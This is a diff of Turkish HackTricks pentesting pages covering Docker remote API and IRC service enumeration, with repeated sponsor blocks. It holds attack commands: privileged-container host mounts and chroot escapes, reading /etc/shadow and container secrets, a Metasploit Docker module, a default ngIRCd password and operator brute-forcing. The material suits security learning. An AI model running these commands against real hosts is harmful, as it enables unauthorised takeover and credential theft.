- SUBSCRIBE (8): Bir istemcinin bir konudan gelen mesajları dinlemek için isteği.
- SUBACK (9): SUBSCRIBE isteğinin sunucu tarafından onaylanması.
- UNSUBSCRIBE (10): Bir istemcinin bir konudan mesaj almaya son vermek için isteği.
- UNSUBSCRIBE (10): Bir istemcinin bir konudan gelen mesajları almaya son vermek için isteği.
- UNSUBACK (11): UNSUBSCRIBE isteğine sunucunun yanıtı.
- PINGREQ (12): İstemci tarafından gönderilen bir kalp atışı mesajı.
- PINGRESP (13): Sunucunun kalp atışı mesajına yanıtı.
- PINGRESP (13): Kalp atışı mesajına sunucunun yanıtı.
- DISCONNECT (14): Bağlantıyı sonlandırmak için istemci tarafından başlatılır.
- 0 ve 15 olarak işaretlenen iki değer yasaklanmıştır ve kullanılmaları yasaktır.
- 0 ve 15 olarak iki değer, ayrılmış olarak işaretlenmiş ve kullanımları yasaktır.
## Shodan
- `port:1883 MQTT`
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io), bir şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **kompromize edilip edilmediğini** kontrol etmek için **ücretsiz** işlevsellikler sunan **karanlık web** destekli bir arama motorudur.
WhiteIntel'in başlıca amacı, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye yazılımı saldırılarıyla mücadele etmektir.
Websitesini ziyaret edebilir ve **ücretsiz** olarak motorlarını deneyebilirsiniz:
{% embed url="https://whiteintel.io" %}
<details>
<summary><strong>Sıfırdan kahraman olacak şekilde AWS hacklemeyi öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Sıfırdan kahraman olmak için AWS hackleme öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
HackTricks'ı desteklemenin diğer yolları:
- **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**]'na göz atın (https://github.com/sponsors/carlospolop)!
- **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
- [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family) koleksiyonumuzu keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family)
- 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi Twitter'da 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live) takip edin.
- **Hacking püf noktalarınızı göndererek HackTricks** ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına PR göndererek paylaşın.
- [**The PEASS Family'yi**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
- 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**'u takip edin**.
- **Hacking püf noktalarınızı göndererek HackTricks ve HackTricks Cloud github depolarına PR'lar göndererek paylaşın**.
</details>

View file

@ -2,31 +2,45 @@
<details>
<summary><strong>AWS hacklemeyi sıfırdan kahramana öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> ile!</strong></summary>
<summary><strong>AWS hacklemeyi sıfırdan kahramana öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong> ile!</strong></summary>
HackTricks'ı desteklemenin diğer yolları:
* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**](https://github.com/sponsors/carlospolop)'na göz atın!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**The PEASS Family'yi**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* **💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)'da **takip edin**.
* [**PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* **💬 [Discord grubuna](https://discord.gg/hRep4RUj7f) katılın veya [telegram grubuna](https://t.me/peass) katılın veya bizi Twitter'da** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)** takip edin.**
* **Hacking püf noktalarınızı paylaşarak PR'lar göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
</details>
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io), **karanlık web** destekli bir arama motorudur ve şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **kompromize edilip edilmediğini** kontrol etmek için **ücretsiz** işlevler sunar.
WhiteIntel'in başlıca amacı, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye saldırılarıyla mücadele etmektir.
Websitesini ziyaret edebilir ve motorlarını **ücretsiz** deneyebilirsiniz:
{% embed url="https://whiteintel.io" %}
---
### Docker Temelleri
#### Nedir
Docker, **konteynerleştirme endüstrisindeki öncü platform** olup **sürekli yenilikleri** öncülük eder. Uygulamaların **gelenekselden geleceğe kadar uzanan** kolayca oluşturulmasını ve dağıtılmasını sağlar ve bunların **çeşitli ortamlarda güvenli bir şekilde dağıtımını** garanti altına alır.
Docker, **konteynerleştirme endüstrisindeki öncü platformdur** ve **sürekli yenilikleri** öncülük eder. Uygulamaların **gelenekselden geleceğe kadar uzanan** kolayca oluşturulmasını ve dağıtılmasını sağlar ve bunların **çeşitli ortamlarda güvenli bir şekilde dağıtılmasını** garanti eder.
#### Temel docker mimarisi
* [**containerd**](http://containerd.io): Bu, konteynerlerin **yaşam döngüsünün kapsamlı yönetiminden** sorumlu olan **çekirdek çalışma zamanı**dır. Bu, **görüntü transferi ve depolamasını** ele almanın yanı sıra konteynerlerin **yürütülmesi, izlenmesi ve ağlanması**nı denetler. **containerd** hakkında **daha detaylı içgörüler** sunulmaktadır.
* **Konteyner-shim**, **başsız konteynerlerin** işlenmesinde **aracı** olarak kritik bir rol oynar ve konteynerler başlatıldıktan sonra **runc**'ın yerini alır.
* [**runc**](http://runc.io): Hafif ve evrensel konteyner çalışma zamanı yetenekleriyle saygı gören runc, **OCI standardı** ile uyumludur. containerd tarafından **OCI yönergelerine göre konteynerleri başlatmak ve yönetmek** için kullanılır ve orijinal **libcontainer**'dan evrim geçirmiştir.
* [**grpc**](http://www.grpc.io), containerd ve **docker motoru** arasındaki iletişimi kolaylaştırmak için **esastır** ve **verimli etkileşimi** sağlar.
* [**OCI**](https://www.opencontainers.org), çalışma zamanı ve görüntüler için **OCI özelliklerini** korumak için önemlidir ve en son Docker sürümlerinin hem **OCI görüntüsüne hem de çalışma zamanı** standartlarına **uyumlu** olduğu belirtilmektedir.
* [**containerd**](http://containerd.io): Bu, konteynerlerin kapsamlı **yaşam döngüsünü yöneten** temel bir çalışma zamanıdır. Bu, **görüntü transferi ve depolama**nın yanı sıra konteynerlerin **yürütülmesi, izlenmesi ve ağlanması**nı da içerir. **containerd** hakkında **daha detaylı bilgiler** sunulmaktadır.
* **Container-shim**, **başsız konteynerlerin** işlenmesinde **aracı** olarak kritik bir rol oynar ve konteynerler başlatıldıktan sonra **runc**'ın yerini alır.
* [**runc**](http://runc.io): Hafif ve evrensel konteyner çalışma zamanı yetenekleriyle saygı gören runc, **OCI standardı** ile uyumludur. **OCI kılavuzlarına** göre konteynerleri **başlatmak ve yönetmek** için containerd tarafından kullanılır ve orijinal **libcontainer**'dan evrim geçirmiştir.
* [**grpc**](http://www.grpc.io), containerd ve **docker-engine** arasındaki iletişimi **kolaylaştırmak** için esastır ve **verimli etkileşimi** sağlar.
* [**OCI**](https://www.opencontainers.org), en son Docker sürümlerinin hem **OCI görüntüsü** hem de **çalışma zamanı** standartlarına **uyumlu** olduğunu korumak için önemlidir.
#### Temel komutlar
```bash
@ -53,7 +67,7 @@ docker system prune -a
```
#### Containerd
**Containerd**, özellikle **Docker ve Kubernetes** gibi konteyner platformlarının ihtiyaçlarını karşılamak üzere geliştirilmiştir. Linux, Windows, Solaris ve daha fazlası da dahil olmak üzere çeşitli işletim sistemlerinde konteynerlerin yürütülmesini basitleştirmeyi amaçlar, işletim sistemine özgü işlevselliği ve sistem çağrılarını soyutlayarak. Containerd'ın amacı, kullanıcılarının gereksinim duyduğu temel özellikleri içermektir ve gereksiz bileşenleri atlamaya çalışır. Ancak, bu hedefi tamamen gerçekleştirmek zorlu olarak kabul edilmektedir.
**Containerd**, özellikle **Docker ve Kubernetes** gibi konteyner platformlarının ihtiyaçlarını karşılamak üzere geliştirilmiştir. Linux, Windows, Solaris ve daha fazlası gibi çeşitli işletim sistemlerinde konteynerlerin yürütülmesini **basitleştirmeyi amaçlar**, işletim sistemine özgü işlevselliği ve sistem çağrılarını soyutlayarak. Containerd'ın amacı, kullanıcıları tarafından gereken temel özellikleri içermektir ve gereksiz bileşenleri atlamaya çalışır. Ancak, bu hedefin tamamen gerçekleştirilmesinin zor olduğu kabul edilmektedir.
Bir ana tasarım kararı, **Containerd'ın ağ işlemlerini ele almamasıdır**. Ağ, dağıtılmış sistemlerde kritik bir unsurdur ve Yazılım Tanımlı Ağ (SDN) ve hizmet keşfi gibi karmaşıklıklar, bir platformdan diğerine önemli ölçüde değişmektedir. Bu nedenle, Containerd, desteklediği platformlar tarafından yönetilen ağ yönlerini bırakır.
@ -75,15 +89,15 @@ ctr container delete <containerName>
```
#### Podman
**Podman**, Red Hat tarafından geliştirilen ve sürdürülen [ık Konteyner İnisiyatifi (OCI) standartlarına](https://github.com/opencontainers) uygun olan açık kaynaklı bir konteyner motorudur. Docker'dan farklı olarak **daemonless mimarisi** ve **rootless konteyner** desteği ile dikkat çeker, kullanıcılara kök ayrıcalıkları olmadan konteyner çalıştırma imkanı sağlar.
**Podman**, Red Hat tarafından geliştirilen ve sürdürülen [ık Konteyner İnisiyatifi (OCI) standartlarına](https://github.com/opencontainers) uygun olan açık kaynaklı bir konteyner motorudur. Docker'dan farklı olarak, **daemonless mimarisi** ve **rootless konteynerler** desteği gibi belirgin özelliklere sahiptir, bu sayede kullanıcıların kök ayrıcalıkları olmadan konteyner çalıştırmasına olanak tanır.
Podman, Docker'ın API'si ile uyumlu olacak şekilde tasarlanmıştır, bu da Docker CLI komutlarının kullanımına olanak tanır. Bu uyumluluk, konteyner görüntüleri oluşturmak için **Buildah** ve itme, çekme ve inceleme gibi görüntü işlemleri için **Skopeo** gibi araçları içeren ekosistemi de kapsar. Bu araçlar hakkında daha fazla bilgi [GitHub sayfalarında](https://github.com/containers/buildah/tree/master/docs/containertools) bulunabilir.
Podman, Docker'ın API'si ile uyumlu olacak şekilde tasarlanmıştır, bu da Docker CLI komutlarının kullanılmasına olanak tanır. Bu uyumluluk, **Buildah** gibi konteyner görüntüleri oluşturmak için araçlar ve itme, çekme ve inceleme gibi görüntü işlemleri için **Skopeo** gibi araçları içeren ekosistemi de kapsar. Bu araçlar hakkında daha fazla ayrıntıya [GitHub sayfalarında](https://github.com/containers/buildah/tree/master/docs/containertools) ulaşılabilir.
**Ana Farklar**
* **Mimari**: Arkaplan daemonu olmadan Docker'ın istemci-sunucu modelinin aksine, Podman bir daemon olmadan çalışır. Bu tasarım, konteynerlerin başlatan kullanıcının ayrıcalıklarıyla çalıştığı anlamına gelir, bu da kök erişimi gereksinimini ortadan kaldırarak güvenliği artırır.
* **Mimari**: Arkaplan daemonu olmadan çalışan Podman, Docker'ın istemci-sunucu modelinden farklı olarak çalışır. Bu tasarım, konteynerlerin başlatan kullanıcının ayrıcalıklarıyla çalışmasını sağlar ve kök erişimi gereksinimini ortadan kaldırarak güvenliği artırır.
* **Systemd Entegrasyonu**: Podman, konteynerleri yönetmek için **systemd** ile entegre olur ve systemd birimleri aracılığıyla konteyner yönetimine olanak tanır. Bu, Docker'ın systemd'i genellikle Docker daemon işlemini yönetmek için kullandığından farklıdır.
* **Rootless Konteynerler**: Podman'ın önemli bir özelliği, konteynerleri başlatan kullanıcının ayrıcalıkları altında çalıştırabilme yeteneğidir. Bu yaklaşım, saldırganların sadece tehlikeye atılan kullanıcının ayrıcalıklarını değil kök erişimini elde etmelerini sağlayarak konteyner ihlalleri ile ilişkili riskleri en aza indirir.
* **Rootless Konteynerler**: Podman'ın önemli bir özelliği, konteynerleri başlatan kullanıcının ayrıcalıkları altında çalıştırabilme yeteneğidir. Bu yaklaşım, saldırganların yalnızca tehlikeye atılan kullanıcının ayrıcalıklarını değil kök erişimini elde etmelerini sağlayarak konteyner ihlalleri ile ilişkili riskleri en aza indirir.
Podman'ın yaklaşımı, kullanıcı ayrıcalık yönetimine ve mevcut Docker iş akışlarıyla uyumluluğa vurgu yaparak güvenli ve esnek bir Docker alternatifi sunar.
@ -99,7 +113,7 @@ podman ls
### Temel Bilgiler
Uzak API varsayılan olarak 2375 bağlantı noktasında çalışırken etkinleştirildiğinde çalışır. Hizmet varsayılan olarak kimlik doğrulama gerektirmeyecektir, bu da bir saldırganın ayrıcalıklı bir docker konteyneri başlatmasına olanak tanır. Uzak API kullanılarak bir kişi, ana bilgisayarın ortamının dosyalarını okuyup/yazabilir ve ana bilgisayarları konteynere bağlayabilir.
Uzak API varsayılan olarak 2375 bağlantı noktasında çalışırken etkinleştirildiğinde. Hizmet varsayılan olarak kimlik doğrulama gerektirmeyecektir, bu da bir saldırganın ayrıcalıklı bir docker konteyneri başlatmasına olanak tanır. Uzak API kullanılarak bir kişi, ana bilgisayarın ortamının dosyalarını okuyup/yazabilir ve ana bilgisayarları / (kök dizini) konteynere bağlayabilir.
**Varsayılan bağlantı noktası:** 2375
```
@ -146,10 +160,10 @@ docker-init:
Version: 0.18.0
GitCommit: fec3683
```
Eğer **docker** komutu ile **uzak docker API'sine bağlanabilirseniz**, hizmetle etkileşimde bulunmak için önceden yorumlanmış olan **docker** [**komutlarını** çalıştırabilirsiniz](2375-pentesting-docker.md#basic-commands).
Eğer **docker** komutu ile **uzak docker API'sine bağlanabilirseniz**, hizmetle etkileşimde bulunmak için önceden yorumlanmış **docker** [**komutlarını** çalıştırabilirsiniz](2375-pentesting-docker.md#basic-commands).
{% hint style="info" %}
`DOCKER_HOST="tcp://localhost:2375"`'i **dışa aktarabilir** ve docker komutunda **-H** parametresini kullanmaktan **kaçınabilirsiniz**
`export DOCKER_HOST="tcp://localhost:2375"` yapabilir ve **docker** komutunda `-H` parametresini kullanmaktan **kaçınabilirsiniz**
{% endhint %}
**Hızlı ayrıcalık yükseltme**
@ -158,7 +172,7 @@ docker run -it -v /:/host/ ubuntu:latest chroot /host/ bash
```
**Curl**
Bazen **2376**'da **TLS** uç noktası için açık görebilirsiniz. Docker istemcisiyle bağlantı kuramadım ama curl ile yapmak mümkün.
Bazen **2376**'yı **TLS** uç noktası için görebilirsiniz. Docker istemcisi ile bağlantı kuramadım ancak curl ile yapmak mümkün.
```bash
#List containers
curl insecure https://tlsopen.docker.socket:2376/containers/json | jq
@ -195,15 +209,15 @@ Eğer bununla ilgili daha fazla bilgi istiyorsan, komutları kopyaladığım yer
msf> use exploit/linux/http/docker_daemon_tcp
nmap -sV --script "docker-*" -p <PORT> <IP>
```
### Kompromize Olma
### Kompromis
Aşağıdaki sayfada bir **docker konteynerinden kaçmanın** yollarını bulabilirsiniz:
Aşağıdaki sayfada bir docker konteynerinden kaçmanın yollarını bulabilirsiniz:
{% content-ref url="../linux-hardening/privilege-escalation/docker-security/" %}
[docker-security](../linux-hardening/privilege-escalation/docker-security/)
{% endcontent-ref %}
Bunu istismar ederek bir konteynerden kaçmak mümkündür, uzaktaki makinede zayıf bir konteyner çalıştırabilir, ondan kaçabilir ve makineyi tehlikeye atabilirsiniz:
Bunu istismar ederek bir konteynerden kaçmak mümkündür, zayıf bir konteyneri uzaktaki makinede çalıştırabilir, ondan kaçabilir ve makineyi tehlikeye atabilirsiniz:
```bash
docker -H <host>:2375 run --rm -it --privileged --net=host -v /:/mnt alpine
cat /mnt/etc/shadow
@ -214,7 +228,7 @@ cat /mnt/etc/shadow
Eğer bir docker kullanan bir ana bilgisayarın içindeyseniz, [**yetkileri yükseltmeyi denemek için bu bilgileri okuyabilirsiniz**](../linux-hardening/privilege-escalation/#writable-docker-socket).
### Çalışan Docker konteynerlerinde sırları keşfetme
### Çalışan Docker konteynerlerinde sırları keşfetmek
```bash
docker ps [| grep <kubernetes_service_name>]
docker inspect <docker_id>
@ -252,7 +266,7 @@ docker cp <docket_id>:/etc/<secret_01> <secret_01>
#### Docker Dosyalarını Güvence Altına Alma
* Docker dosyanızı incelemek ve tüm türden yan yapılandırmaları bulmak için [https://github.com/buddy-works/dockerfile-linter](https://github.com/buddy-works/dockerfile-linter) aracını kullanabilirsiniz. Her yan yapılandırmaya bir kimlik verilecek, her birini nasıl düzelteceğinizi [https://github.com/buddy-works/dockerfile-linter/blob/master/Rules.md](https://github.com/buddy-works/dockerfile-linter/blob/master/Rules.md) adresinden bulabilirsiniz.
* Docker dosyanızı incelemek ve tüm türden yan yapılandırmaları bulmak için [https://github.com/buddy-works/dockerfile-linter](https://github.com/buddy-works/dockerfile-linter) aracını kullanabilirsiniz. Her yan yapılandırmaya bir kimlik verilecek ve her birini nasıl düzelteceğinizi [https://github.com/buddy-works/dockerfile-linter/blob/master/Rules.md](https://github.com/buddy-works/dockerfile-linter/blob/master/Rules.md) buradan bulabilirsiniz.
* `dockerfilelinter -f Dockerfile`
![](<../.gitbook/assets/image (173).png>)
@ -275,7 +289,7 @@ docker cp <docket_id>:/etc/<secret_01> <secret_01>
#### Şüpheli Etkinlikleri Günlüğe Kaydetme
* Çalışan konteynerlerdeki **şüpheli davranışları** tespit etmek için [https://github.com/falcosecurity/falco](https://github.com/falcosecurity/falco) aracını kullanabilirsiniz.
* Aşağıdaki parçada **Falco'nun bir çekirdek modülü derlediğini ve eklediğini** görebilirsiniz. Bundan sonra kuralları yükler ve **şüpheli etkinlikleri kaydetmeye başlar**. Bu durumda, 2 ayrıcalıklı konteynerin başlatıldığını, bunlardan birinin hassas bir bağlantı noktasıyla başlatıldığını ve birkaç saniye sonra konteynerlerden birinde bir kabuğun açıldığını tespit etmiştir.
* Aşağıdaki parçada **Falco'nun bir çekirdek modülü derlediğini ve eklediğini** görebilirsiniz. Bundan sonra, kuralları yükler ve **şüpheli etkinlikleri kaydetmeye başlar**. Bu durumda, başlatılan 2 ayrıcalıklı konteyner tespit edildi, bunlardan biri hassas bir bağlantı noktasıyla ve birkaç saniye sonra konteynerlerden birinde bir kabuk açıldığı tespit edildi.
```bash
docker run -it --privileged -v /var/run/docker.sock:/host/var/run/docker.sock -v /dev:/host/dev -v /proc:/host/proc:ro -v /boot:/host/boot:ro -v /lib/modules:/host/lib/modules:ro -v /usr:/host/usr:ro falco
* Setting up /usr/src links from host
@ -324,3 +338,31 @@ Docker'ı izlemek için auditd kullanabilirsiniz.
* [https://ti8m.com/blog/Why-Podman-is-worth-a-look-.html](https://ti8m.com/blog/Why-Podman-is-worth-a-look-.html)
* [https://stackoverflow.com/questions/41645665/how-containerd-compares-to-runc](https://stackoverflow.com/questions/41645665/how-containerd-compares-to-runc)
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io), şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **tehlikeye atılıp atılmadığını** kontrol etmek için **ücretsiz** işlevler sunan **dark web** destekli bir arama motorudur.
WhiteIntel'in asıl amacı, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye saldırılarıyla mücadele etmektir.
Websitesini ziyaret edebilir ve **ücretsiz** olarak motorlarını deneyebilirsiniz:
{% embed url="https://whiteintel.io" %}
<details>
<summary><strong>Sıfırdan kahraman olmak için AWS hackleme öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
HackTricks'i desteklemenin diğer yolları:
* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)'yi keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* **💬 [Discord grubuna](https://discord.gg/hRep4RUj7f) katılın veya [telegram grubuna](https://t.me/peass) katılın veya bizi Twitter'da takip edin** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Hacking püf noktalarınızı paylaşarak PR'lar göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
</details>

View file

@ -2,34 +2,48 @@
<details>
<summary><strong>AWS hacklemeyi sıfırdan kahraman olmak için</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong> öğrenin!</strong></summary>
<summary><strong>AWS hacklemeyi sıfırdan kahramana öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> ile!</strong></summary>
HackTricks'ı desteklemenin diğer yolları:
* **Şirketinizi HackTricks'te reklamınızı görmek** veya **HackTricks'i PDF olarak indirmek** için [**ABONELİK PLANLARI'na**](https://github.com/sponsors/carlospolop) göz atın!
* **Şirketinizi HackTricks'te reklamınızı görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**]'na göz atın (https://github.com/sponsors/carlospolop)!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**The PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**'ı takip edin**.
* **Hacking hilelerinizi** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına **PR göndererek paylaşın**.
* [**The PEASS Family**]'yi (https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**]'i (https://opensea.io/collection/the-peass-family) içeren koleksiyonumuz
* **💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katılın veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)'da **takip edin**.
* **Hacking püf noktalarınızı paylaşarak PR'lar göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
</details>
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io), **karanlık ağ** destekli bir arama motorudur ve şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **kompromize edilip edilmediğini** kontrol etmek için **ücretsiz** işlevler sunar.
WhiteIntel'in başlıca amacı, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye saldırılarıyla mücadele etmektir.
Websitesini ziyaret edebilir ve motorlarını **ücretsiz** deneyebilirsiniz:
{% embed url="https://whiteintel.io" %}
---
## Temel Bilgiler
IRC, başlangıçta **düz metin protokolü** olarak tanımlanmıştır ve IANA tarafından **194/TCP** olarak atanmıştır, ancak genellikle **root yetkilerine** ihtiyaç duymadan çalışmak için **6667/TCP** ve benzeri bağlantı noktalarında çalıştırılır.
IRC, başlangıçta **düz metin protokolü** olarak tanımlandı ve IANA tarafından **194/TCP** olarak atanmasına rağmen genellikle **root ayrıcalıklarına ihtiyaç duymamak** için **6667/TCP** ve benzeri bağlantı noktalarında çalıştırılır.
Bir sunucuya bağlanmak için sadece bir **rumuz** gereklidir. Bağlantıdan sonra, sunucu kullanıcının IP'si üzerinde ters DNS araması yapar.
Bir sunucuya bağlanmak için bir **rumuz** yeterlidir. Bağlantıdan sonra sunucu, kullanıcının IP'si üzerinde ters-DNS araması yapar.
Kullanıcılar, daha fazla erişim için bir **kullanıcı adı** ve **parola** gerektiren **operatörler** ve düzenli **kullanıcılar** olarak bölünür. Operatörlerin farklı ayrıcalık seviyeleri vardır ve en üstte yöneticiler bulunur.
Kullanıcılar, daha fazla erişim için bir **kullanıcı adı** ve **şifre** gerektiren **operatörler** ve düzenli **kullanıcılar** olarak ayrılır. Operatörler, yöneticilerin en üstünde olmak üzere değişen ayrıcalıklara sahiptir.
**Varsayılan bağlantı noktaları:** 194, 6667, 6660-7000
```
PORT STATE SERVICE
6667/tcp open irc
```
## Numaralandırma
## Sıralama
### Afiş
### Banner
IRC, **TLS**'yi destekleyebilir.
```bash
@ -38,7 +52,7 @@ openssl s_client -connect <IP>:<PORT> -quiet
```
### Kılavuz
Burada, IRC'ye **rastgele bir takma ad** kullanarak nasıl bağlanacağınızı ve erişeceğinizi ve ardından bazı ilginç bilgileri nasıl sıralayacağınızı görebilirsiniz. IRC'nin daha fazla komutunu [buradan](https://en.wikipedia.org/wiki/List\_of\_Internet\_Relay\_Chat\_commands#USERIP) öğrenebilirsiniz.
Burada, **rastgele takma adı** kullanarak IRC'ye nasıl bağlanıp erişebileceğinizi ve ardından bazı ilginç bilgileri nasıl sıralayabileceğinizi görebilirsiniz. IRC'nin daha fazla komutunu [buradan](https://en.wikipedia.org/wiki/List\_of\_Internet\_Relay\_Chat\_commands#USERIP) öğrenebilirsiniz.
```bash
#Connection with random nickname
USER ran213eqdw123 0 * ran213eqdw123
@ -67,50 +81,45 @@ JOIN <CHANNEL_NAME> #Connect to a channel
#Operator creds Brute-Force
OPER <USERNAME> <PASSWORD>
```
Ayrıca, sunucuya bir şifre ile giriş yapmayı deneyebilirsiniz. ngIRCd için varsayılan şifre `wealllikedebian`'dır.
Ayrıca, sunucuya bir şifre ile giriş yapmaya çalışabilirsiniz. ngIRCd için varsayılan şifre `wealllikedebian`'dır.
```bash
PASS wealllikedebian
NICK patrick
USER test1 test2 <IP> :test3
```
### **IRC hizmetlerini bulma ve tarama**
IRC (Internet Relay Chat), kullanıcıların gerçek zamanlı olarak metin tabanlı iletişim kurmasını sağlayan bir protokoldür. IRC sunucuları, çeşitli hizmetler sunar ve bu hizmetlerin güvenlik açıklarını tespit etmek için tarama yapabilirsiniz.
IRC sunucularını bulmak için aşağıdaki adımları izleyebilirsiniz:
1. **DNS taraması**: IRC sunucularının IP adreslerini bulmak için DNS taraması yapabilirsiniz. Örneğin, `irc.example.com` gibi bir IRC sunucusunun IP adresini bulmak için `nslookup` veya `dig` gibi araçları kullanabilirsiniz.
2. **Port taraması**: IRC sunucuları genellikle 6667 veya 6697 numaralı portları kullanır. Bir port taraması aracılığıyla bu portları taramak, IRC sunucularını tespit etmenizi sağlar. Örneğin, `nmap` gibi bir port tarama aracını kullanabilirsiniz.
IRC sunucularını tespit ettikten sonra, güvenlik açıklarını tespit etmek için aşağıdaki adımları izleyebilirsiniz:
1. **Servis sürüm tespiti**: IRC sunucusunun sürümünü tespit etmek, potansiyel güvenlik açıklarını belirlemek için önemlidir. Bu bilgiyi elde etmek için `nmap` gibi bir port tarama aracını kullanabilirsiniz.
2. **Zayıf kimlik doğrulama**: IRC sunucuları genellikle kullanıcıların kimlik doğrulamasını gerektirir. Zayıf veya varsayılan kimlik doğrulama ayarları, saldırganların IRC sunucusuna yetkisiz erişim elde etmesine neden olabilir. Bu nedenle, varsayılan kimlik doğrulama ayarlarının değiştirildiğinden emin olun.
3. **Kanal saldırıları**: IRC sunucularında kanallar, kullanıcıların bir araya gelip sohbet ettiği yerlerdir. Kanal saldırıları, kanal operatörlerinin yetkisiz erişim elde etmesine veya kanalın kontrolünü ele geçirmesine olanak tanır. Bu nedenle, IRC sunucusunda kullanılan kanalların güvenliğini sağlamak önemlidir.
IRC hizmetlerini bulmak ve taramak, potansiyel güvenlik açıklarını tespit etmek için önemli bir adımdır. Bu adımları izleyerek IRC sunucularını ve hizmetlerini etkili bir şekilde analiz edebilirsiniz.
```bash
nmap -sV --script irc-botnet-channels,irc-info,irc-unrealircd-backdoor -p 194,6660-7000 <ip>
```
### [Brute Force](../generic-methodologies-and-resources/brute-force.md#irc)
